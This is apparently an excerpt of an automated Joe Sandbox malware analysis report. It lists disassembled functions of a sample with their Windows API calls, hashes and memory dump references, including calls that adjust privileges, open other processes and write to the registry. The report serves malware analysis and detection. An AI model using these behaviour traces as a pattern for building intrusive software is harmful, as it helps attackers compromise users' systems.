                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalPaletteSection$CapsCreateDeviceEnterSelect$CompatibleHalftoneLeaveObjectRealizeRelease
                                                                                  • String ID:
                                                                                  • API String ID: 979337279-0
                                                                                  • Opcode ID: c979cf055c5d8e633e0d12ce1959210ced0ef591ae4170a44c1ce81bc9b8a533
                                                                                  • Instruction ID: dcbd63a4b2040aefa745ca3ada98607f7f44feadbce07b3defe4e3f5aef93531
                                                                                  • Opcode Fuzzy Hash: c979cf055c5d8e633e0d12ce1959210ced0ef591ae4170a44c1ce81bc9b8a533
                                                                                  • Instruction Fuzzy Hash: 57313D34A10618EFC704EF69D981D9EB7F5FF49710B6251A0E808AB721D730EE44DB60
                                                                                  Function 6A6D79C0 Relevance: 6.1, APIs: 4, Instructions: 77COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6D79EE
                                                                                    • Part of subcall function 6A6DB0A0: _memset.LIBCMT ref: 6A6DB0C8
                                                                                  • _memset.LIBCMT ref: 6A6D7A26
                                                                                  • _memset.LIBCMT ref: 6A6D7A43
                                                                                  • _memset.LIBCMT ref: 6A6D7A60
                                                                                    • Part of subcall function 6A6D5160: LoadLibraryA.KERNEL32(version.dll,?,?,00000000), ref: 6A6D519C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 1275148839-0
                                                                                  • Opcode ID: df7fe4c483e12def53df5b104270421f8fec4def07a5e82bf947986d86f07042
                                                                                  • Instruction ID: 412aed6eae7bd646819d47859247c3e916ba6d4160fc25c61f5a29557a8aed8c
                                                                                  • Opcode Fuzzy Hash: df7fe4c483e12def53df5b104270421f8fec4def07a5e82bf947986d86f07042
                                                                                  • Instruction Fuzzy Hash: FA21F4B1508384AAD220D764DD89FDB77EC9F84348F48492DE59886152FA70970CC7E3
                                                                                  Function 6A6DB0A0 Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 6A6DB0C8
                                                                                    • Part of subcall function 6A6DD8E0: RtlAdjustPrivilege.NTDLL ref: 6A6DD90C
                                                                                    • Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD94C
                                                                                    • Part of subcall function 6A6DD8E0: ZwOpenProcess.NTDLL(00010000,001FFFFF,?,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD96F
                                                                                    • Part of subcall function 6A6DD8E0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD997
                                                                                    • Part of subcall function 6A6DD8E0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9B0
                                                                                    • Part of subcall function 6A6DD8E0: ZwFreeVirtualMemory.NTDLL(000000FF,00000014,00000014,00008000,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9C7
                                                                                    • Part of subcall function 6A6DD8E0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DD9F0
                                                                                    • Part of subcall function 6A6DD8E0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 6A6DDA03
                                                                                  • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104,?,?,?,00000000,00000000), ref: 6A6DB10C
                                                                                  • _strncpy.LIBCMT ref: 6A6DB131
                                                                                  • CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104,?,?,?,00000000,00000000), ref: 6A6DB13A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: MemoryVirtual$AllocateInformationOpenProcessQuerySystem$AdjustCloseFileFreeHandleModuleNamePrivilege_memset_strncpy
                                                                                  • String ID:
                                                                                  • API String ID: 2990829516-0
                                                                                  • Opcode ID: 7e1580508632bc232c63419dded08237c77dbf79b7afdbaaa9ca82cdc577d2d7
                                                                                  • Instruction ID: 4393422ef457d41ced53bfa658858222377870ae029c3b3ad67d86b4e8705226
                                                                                  • Opcode Fuzzy Hash: 7e1580508632bc232c63419dded08237c77dbf79b7afdbaaa9ca82cdc577d2d7
                                                                                  • Instruction Fuzzy Hash: 06114C756042406FD321E714CC0AFEB37E9DFC9344F454828E999C7241DFB4954887E2
                                                                                  Function 0BEB1BCC Relevance: 6.1, APIs: 4, Instructions: 59registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetClassInfoA.USER32(0BE90000,0BEB1BBC,?), ref: 0BEB1BED
                                                                                  • UnregisterClassA.USER32(0BEB1BBC,0BE90000), ref: 0BEB1C16
                                                                                  • RegisterClassA.USER32(0BEF8BCC), ref: 0BEB1C20
                                                                                  • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0BEB1C6B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                                  • String ID:
                                                                                  • API String ID: 4025006896-0
                                                                                  • Opcode ID: fb95d863dc9ab684edd3b9c4ea2ec162595adf45e5ca93baa113acb5bcbdc393
                                                                                  • Instruction ID: 224a49bc84fee4e249055d83880d1e7d027af1d6ade6b7f6a4752690652d0127
                                                                                  • Opcode Fuzzy Hash: fb95d863dc9ab684edd3b9c4ea2ec162595adf45e5ca93baa113acb5bcbdc393
                                                                                  • Instruction Fuzzy Hash: 0E0161B5620206AFCF00EBA9ECA1FDB33EEA749360F005111F504EB290D735DD598B99
                                                                                  Function 6A6F161B Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog3.LIBCMT ref: 6A6F1622
                                                                                    • Part of subcall function 6A6EE09C: _malloc.LIBCMT ref: 6A6EE0BA
                                                                                  • __CxxThrowException@8.LIBCMT ref: 6A6F1658
                                                                                  • FormatMessageA.KERNEL32(00001100,00000000,?,00000800,6A725A50,00000000,00000000,?,6A71B745,6A71B74D,6A725A50,00000004,6A6DEA16,?,6A6DE6B8,80070057), ref: 6A6F1683
                                                                                    • Part of subcall function 6A6EE27D: __cftof.LIBCMT ref: 6A6EE28E
                                                                                  • LocalFree.KERNEL32(?), ref: 6A6F16AC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow__cftof_malloc
                                                                                  • String ID:
                                                                                  • API String ID: 1808948168-0
                                                                                  • Opcode ID: a7dfac345b32ada7c81c0a7eeb0a6350cb0d71d4a13e2d1c8bc288f0defb8404
                                                                                  • Instruction ID: 051981ed6ebb7296d810ec00919315d42c6876846ea438358f93f38e91acbea5
                                                                                  • Opcode Fuzzy Hash: a7dfac345b32ada7c81c0a7eeb0a6350cb0d71d4a13e2d1c8bc288f0defb8404
                                                                                  • Instruction Fuzzy Hash: E311A0B1504209BFDB00DFA4CC89DAA3BEABB05358F154929F725CA191EB318950CB24
                                                                                  Function 6A6EF86E Relevance: 6.1, APIs: 4, Instructions: 57threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __EH_prolog3.LIBCMT ref: 6A6EF875
                                                                                    • Part of subcall function 6A6F0620: __EH_prolog3.LIBCMT ref: 6A6F0627
                                                                                  • __strdup.LIBCMT ref: 6A6EF897
                                                                                  • GetCurrentThread.KERNEL32 ref: 6A6EF8C4
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6A6EF8CD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentH_prolog3Thread$__strdup
                                                                                  • String ID:
                                                                                  • API String ID: 4206445780-0
                                                                                  • Opcode ID: 4381138e7992d6eb3a4ffef2fcecfe62fb928cb02c611dc3e8d528b04abf62d5
                                                                                  • Instruction ID: 88af850e96406ac41bd163d234ffc39dc4d46c0f7a7a96267571467fcccfa287
                                                                                  • Opcode Fuzzy Hash: 4381138e7992d6eb3a4ffef2fcecfe62fb928cb02c611dc3e8d528b04abf62d5
                                                                                  • Instruction Fuzzy Hash: 0C219DB0805B408FD7618F6AC54924AFBF8BFA4704F11891FD1AAC7A22DBB4A445CF55
                                                                                  Function 6A6F9A18 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 6A6F9A44
                                                                                  • SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 6A6F9A6F
                                                                                  • GetCapture.USER32 ref: 6A6F9A81
                                                                                  • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 6A6F9A90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Capture
                                                                                  • String ID:
                                                                                  • API String ID: 1665607226-0
                                                                                  • Opcode ID: ddfb3a66e377124841b2c14be2a160e4ba45368cb1e40aa9f4a26f4d1d63c385
                                                                                  • Instruction ID: fa228eaf25fbb4540b289293776edd717bc464545869be74a96fb40bc13fecba
                                                                                  • Opcode Fuzzy Hash: ddfb3a66e377124841b2c14be2a160e4ba45368cb1e40aa9f4a26f4d1d63c385
                                                                                  • Instruction Fuzzy Hash: 3C0125313502557BDB215B668CCDF9B3E7ADBCAB14F1504B9F6059A1A7CE918801DA20
                                                                                  Function 6A6F4F40 Relevance: 6.1, APIs: 4, Instructions: 56registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 6A6F4F7B
                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 6A6F4F84
                                                                                  • swprintf.LIBCMT ref: 6A6F4FA1
                                                                                  • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 6A6F4FB2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClosePrivateProfileStringValueWriteswprintf
                                                                                  • String ID:
                                                                                  • API String ID: 22681860-0
                                                                                  • Opcode ID: 0dd5840a5eb82627fa7ebb3e5c471ee273b60eb1445d6781dd215e3111bafb98
                                                                                  • Instruction ID: 27c7b1c0127efa9ab20e342879fc93751b2a84ad55b3ab044b951ccc6e09444d
                                                                                  • Opcode Fuzzy Hash: 0dd5840a5eb82627fa7ebb3e5c471ee273b60eb1445d6781dd215e3111bafb98
                                                                                  • Instruction Fuzzy Hash: B201C472501209BBDB109F64CD49FAFB7EDAF8A718F020825FA11E7180DB74ED0587A4
                                                                                  Function 6A6FB046 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 6A6EE09C: _malloc.LIBCMT ref: 6A6EE0BA
                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 6A6FB07A
                                                                                  • GetCurrentProcess.KERNEL32(?,00000000), ref: 6A6FB080
                                                                                  • DuplicateHandle.KERNEL32(00000000), ref: 6A6FB083
                                                                                  • GetLastError.KERNEL32(?), ref: 6A6FB09E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
                                                                                  • String ID:
                                                                                  • API String ID: 3704204646-0
                                                                                  • Opcode ID: a5019984da37569fdb3d8c1abcdca9222c857c7390bc372935d947b6c2468e16
                                                                                  • Instruction ID: c14f2778d071ad59add8ed423930bd531a2ff5509d196e16fe0a77111a25a86f
                                                                                  • Opcode Fuzzy Hash: a5019984da37569fdb3d8c1abcdca9222c857c7390bc372935d947b6c2468e16
                                                                                  • Instruction Fuzzy Hash: AD017131700204BFDB109BA6CC49F5A7BEAEB85764F158825F924CB282DF71DC02CB60
                                                                                  Function 0BEAD678 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • FindResourceA.KERNEL32(?,?,?), ref: 0BEAD68F
                                                                                  • LoadResource.KERNEL32(?,0BEAD71C,?,?,?,0BEA954C,?,00000001,00000000,?,0BEAD5E8,?), ref: 0BEAD6A9
